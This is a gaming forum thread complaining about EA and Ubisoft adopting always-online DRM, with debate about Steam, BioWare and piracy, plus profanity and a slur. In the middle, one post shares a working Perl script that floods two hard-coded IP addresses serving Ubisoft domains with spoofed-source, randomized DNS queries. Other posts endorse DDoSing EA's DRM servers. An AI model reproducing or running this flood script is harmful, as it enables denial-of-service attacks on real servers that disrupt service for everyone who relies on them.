• EA follows Ubisoft, will sell titles with 'always on' DRM

Ubisoft's new DRM was hacked WITHIN A DAY OF IT'S RELEASE. Are these huge companies really so stupid as to think that this will in any way deter pirates? It's just going to make less people buy their games!
EA made pretty shitty games to begin with, doesn't really concern me.
EA owns bioware, reconsider that statement.
No! bad move EA, I was just starting to like you again :saddowns:.
Needs more amusing DRM that was provided by Batman and ArmA 2(I think?). That's the best form of DRM I believe. :v:
This is like increasing the age where you can legally drink and expecting underage drinking to go down.
Valve has pirates in a dicklock, if they bought anything they risk losing all their games, legal or otherwise. Sure they can just pirate them again but I don't think would work for long.
Honestly I'll never buy or even associate myself with EA or Ubisoft's products until the DRM is removed.
Because not everyone has a crystal ethernet line and a golden modem.
neither do I, I have a wireless connection at 512kbs
EA owns bioware, reconsider that statement.
I don't like those game either. No.
As if people didn't already have a laundry list of good reasons to pirate EA's shit.
I don't like those game either. No.
:colbert: You don't like ANYTHING bioware has made? None of it, zip?
surprised activision hasn't started using this as well
:colbert: You don't like ANYTHING bioware has made? None of it, zip?
No. Only Valve. Valve is best. Also, a few other things, I hardly play anymore. Epic games, Bethesda, etc etc. EDIT: If you give me a box, fuck off, people have their opinions.
Someone should raid EA headquarters with torches and pitchforks. And maybe a few swords. I have repeated my opinion quite a few times on this issue in various threads. Plus most of what i will say will already be mentioned by others. In short words, this is disrespectful to the gaming community, beneficial to piracy, and generally destructive. I also said before that piracy should be fought with comfort and convenience, not totalitarian border line malicious DRM software, partially why Steam is so successful in that area.
http://www.youtube.com/watch?v=y8Kyi0WNg40 I'm sick of this DRM crap. create's a pain in the ass for us legitamate buyers, and people who pirate will most likely disable it all together. so me, with my bought copy, will have my internet cut out and be fucked. Nextdoor Ned with his pirated version will also be cut out, but he will happily be playing his stolen version.
This shit better not be in Battlefield 3.
:colbert: You don't like ANYTHING bioware has made? None of it, zip?
Let the guy have his opinion man... If he doesnt like a company's games, leave that to him. shoulda seen the broken auto merge coming :\
I guess EA didn't watch Gabe's speech.
Well shit, Ubisoft makes good games too! Where's that damn comic of the fatass kid saying "You are a bitch" from Gunshow when I need it
I hate antipiracy shit, it ruins good games.
Your kidding right? EA I am disappoint.
Your kidding right? EA I am disappoint.
get your hands out of my kidney also ea is still bunch of faggots, it's Dice who tried to make EA look better
Valve know that DRM systems like this lower the value of the product
I like how they say this yet when you buy games on STEAM, or some games require STEAM to be activated on an account, it's then tied to only your steam account. How doesn't this lower the value?
It's gonna be Spore all over again.
I like how they say this yet when you buy games on STEAM, or some games require STEAM to be activated on an account, it's then tied to only your steam account. How doesn't this lower the value?
I don't understand what's wrong with that. You bought the game and it's on your steam account, now you can lose the disk/break the disk and lose the CD code and still own the game and install it on as many machines as you want. You can play in offline mode as well if you want to play a games singleplayer and you don't have internet at the time.
Oh look, shitty DRM that punishes legitimate users. Please remain calm, folks, nothing to worry about here, there will be a crack out in a matter hours "fixing" the issues. Looks like someone will have to update this to work with EA's DRM:
#!/usr/bin/perl # # fight the drm # # ensure outbound packets are not natted # # requires linux/bsd/osx # # coordinated use will see increased benefits # # spoofs src ip address on every request, randomizes type, domain and id on each call # # for educational purposes only use Net::RawIP; use Net::DNS::Packet; use Thread qw(async); my @suffix = ('.ubi.com', '.ubisoft.com', '.assassinscreed.com', '.splintercell.com'); my @rrtypes = ('A', 'NS', 'CNAME', 'SOA', 'NULL', 'HINFO', 'MX', 'TXT', 'AAAA', 'SRV', 'NSEC', 'SPF'); my $delay = 0.100; my $volume = 1; async { flood("216.98.52.5"); }; async { flood("216.98.52.6"); }; sub flood { my $port = '53'; my $host = $_[0]; while(1) { my $prefix = join'', map +(0..9,'a'..'z')[rand(36)], 1..rand(20)+2; my $domain = join('',$prefix,$suffix[rand @suffix]); my $rrtype = $rrtypes[rand @rrtypes]; my $dns = Net::DNS::Packet->new($domain,$rrtype,"IN"); $dns->header->id(int(rand(65000))); my $payload=$dns->data; my $source = join ".", map int rand 256, 1 .. 4; my $udp = new Net::RawIP({ ip=>{saddr=>$source, daddr=>$host}, udp=>{source=>$port, dest=>$port, data=>$payload} }); $udp->send($delay,$volume); } } while(1){}

I assume this PHP script is used to DDOS the Ubisoft DRM servers?
I thought they have learn their lesson after the Spore incident?
I like how they say this yet when you buy games on STEAM, or some games require STEAM to be activated on an account, it's then tied to only your steam account. How doesn't this lower the value?
Obviously they're not 100% opposed to lowering the value of an offering. Their games would be most valuable to me if I had all of the source code and didn't have to activate them via Steam. Obviously, giving customers 100% of the value possible can have consequences and they're not going to do that (though they do offer a lot of code via the SDK. clearly they're doing everything they can without hurting themselves too badly)
Uhh... Do the companies know how to breathe? I am still wondering how they can still be alive when they seem to be so stupid. Don't then know like a lot people don't have internet or have shit connection that break often? Bravo, Ubisoft! We really appreciate your effort to prevent piracy! :bravo:
Let's DDoS EA's DRM servers when they launch the game so nobody can play :D In actuality, what's the point? Turn on always on DRM, and you promote piracy.
No, pirates will play.
